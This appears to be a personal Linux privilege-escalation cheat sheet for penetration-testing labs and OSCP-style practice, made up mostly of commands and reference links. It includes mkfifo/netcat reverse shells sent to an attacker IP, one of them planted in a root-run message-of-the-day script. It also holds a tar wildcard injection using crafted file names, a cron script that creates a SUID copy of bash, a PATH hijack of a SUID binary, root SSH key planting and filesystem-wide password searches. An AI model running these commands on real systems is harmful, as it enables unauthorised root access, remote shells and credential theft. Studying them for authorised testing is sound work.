Linux Privilege Escalation

Awesome lab and cheat-sheets

https://book.hacktricks.xyz/linux-unix/privilege-escalation

https://tryhackme.com/room/linuxprivesc

https://tryhackme.com/room/linuxprivescarena

Start with better shell

script /dev/null -c bash

^Z

stty raw -echo; fg
nc -lnvp 443
            reset
reset: unknown terminal type unknown
Terminal type? screen
www-data@victim:~/dirs$ 

History

checking users, architecture and services.

history
cat ~/.bash_history
cat .viminfo        # https://youtu.be/kbw4_4jUP_U?t=1915
which gcc           # https://github.com/mzet-/linux-exploit-suggester
find . -type f -ls  # under /home/user dir, finding all files

Git

find / -type d -name '.git' 2>/dev/null

Misconfigured NFS

NSF (no_root_squash)

• cat /etc/exports

• showmount -e $IP

• https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/

• https://steflan-security.com/linux-privilege-escalation-exploiting-nfs-shares/

• https://resources.infosecinstitute.com/topic/exploiting-nfs-share/

Interesting locations

/opt
/dev/shm
/var/www/html      # looking for sql credentials
ls -alh /home/user # looking for .sth_customized

Exploiting SUID Executable(bash, binaries)

Search for SUID files and exploit

• Search find / -perm /4000 2>/dev/null or find / -perm -u=s -type f 2>/dev/null
• Find all U&G find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
• SUID3NUM! RUN IT BEFORE linpeas https://github.com/Anon-Exploiter/SUID3NUM
• Either gtfobins works or use strings or ltrace
• Find files owned by lateralUser find / -user lateralUser 2>/dev/null
• Exploit ls -l /bin/bash /bin/bash -p
• apt list --upgradable
• Worth to mention, try both with/without sudo. Like nmap --interactive

Missing part from the above lab. Environment variables after found an exploitable suid-binary

It needs something like popen or execv whom open other processes. The bash script can work under popen('div-script ...snip...'). In other more common scenarios, bash scripts don't honour SUID for security reasons. Use msfvenom to generate elf instead.

user@debian:~$ echo "/bin/bash" > service
user@debian:~$ chmod +x service 
user@debian:~$ PATH=.:$PATH /usr/local/bin/suid-env

Capability

getcap *
getcap -r / 2>/dev/null
ls -al /usr/bin/ | grep -i suid-binary
man capabilities

or specific a text

grep 'marcus' /etc -R 2>/dev/null
grep --text "flag{" / -R 2>/dev/null

Groups

1. groups
2. find / -group staff 2>/dev/null
3. pspy

Debian: https://wiki.debian.org/SystemGroups

Ubuntu: https://www.phy.ntnu.edu.tw/demolab/html.php?html=doc/base-passwd/users-and-groups

Exploit tar wildcards

https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attack ip> 4242 >/tmp/f" > shell.sh
touch "/absolute/path/that/writable/--checkpoint-action=exec=sh shell.sh"
touch /var/www/html/--checkpoint=1

Run as another user

• sudo -u user command or sudo -l
• su - better than without the dash
• https://www.cyberciti.biz/open-source/command-line-hacks/linux-run-command-as-different-user/
• https://www.oreilly.com/library/view/linux-security-cookbook/0596003919/ch05s03.html
• https://unix.stackexchange.com/questions/7013/why-do-we-use-su-and-not-just-su

Cron is your friend

cat /etc/crontab crontabs crontab -l crontab -e and more https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs or ps -aux ps aux for running process

#!/bin/bash

cp /bin/bash /bin/alvins
chmod u+s /bin/alvins

PS to watch out things like VNC and others

ps aux
Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 12
# Grab more info for a specific one
ps auxww | grep vnc
... 000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1

ps -ax | grep <port> # Get ports from Jetstar

Symlink indirect exploit

ln -s /home/user/.ssh /writable/path/under/cron

https://crontab-generator.org/

https://crontab.guru/

Pwn welcome message

echo "cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/" >> 00-header # /etc/update-motd.d/00-header
echo "rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|sh -i 2>&1|nc 10.10.16.6 4244 >/tmp/g" >> /etc/update-motd.d/00-header  # Seeing close the /g here

www-data with ssh

https://0xdf.gitlab.io/2020/06/23/htb-popcorn.html#priv-www-data--root

reused id_rsa key

Keep looking into the .ssh folder. It may surprise you.

Before the Tools

Check running process

netstat -tunlp
netstat -tunleep4 | grep "127.0.0.1"
netstat -tulpn | grep LISTEN
netstat -ano # will also give Active UNIX domain sockets
ss -tupln

Port forwarding

Find a folder includes something like .bashrc or .cache to put the id_rsa.pub into the .ssh/authorized_keys

ssh strapi@horizontall.htb -i .ssh/id_rsa -L 8080:127.0.0.1:8443

Then you can open 8080 on your kali to see what happening on target's 8443. Interesting thing: Try HTTPS when you see 443. https://localhost:8080

Lateral Movement

find . | grep conf

USBCreator

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

found vuln under /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /dev/shm/.0xdf true

Tools with the log

• ./linpeas.sh | tee linlog.txt
• sed -n -e 1,500p winpeas_fast -> Read result separately to fit the terminal
• pspy Always try to login via ssh again after setup since it may trigger some treats. Also be patient on it
• ps -ef | grep root
• If Python2 exist https://github.com/sleventyeleven/linuxprivchecker

Dirty Trick

grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2>/dev/null

locate password | more

Expand knowledge

• https://www.hackingarticles.in/lxd-privilege-escalation/
• https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md
• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
• https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html
• https://payatu.com/guide-linux-privilege-escalation
• https://null-byte.wonderhowto.com/how-to/find-exploit-suid-binaries-with-suid3num-0215789/

Beyond OSCP which i believe

https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/

Interesting

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

https://gtfobins.github.io/gtfobins/journalctl/ The trick here is that journalctrl will output to stdout if it can fit onto the current page, but into less if it can’t. Since I’m running it with -n 5, that means only five lines come out, so I need to shrink my terminal to smaller than 5 lines, and I’ll get sent into less, still as root.

Start with a small terminal or stty rows 3

Inside docker

capsh --print

RPM payloads

https://medium.com/@klockw3rk/privilege-escalation-how-to-build-rpm-payloads-in-kali-linux-3a61ef61e8b2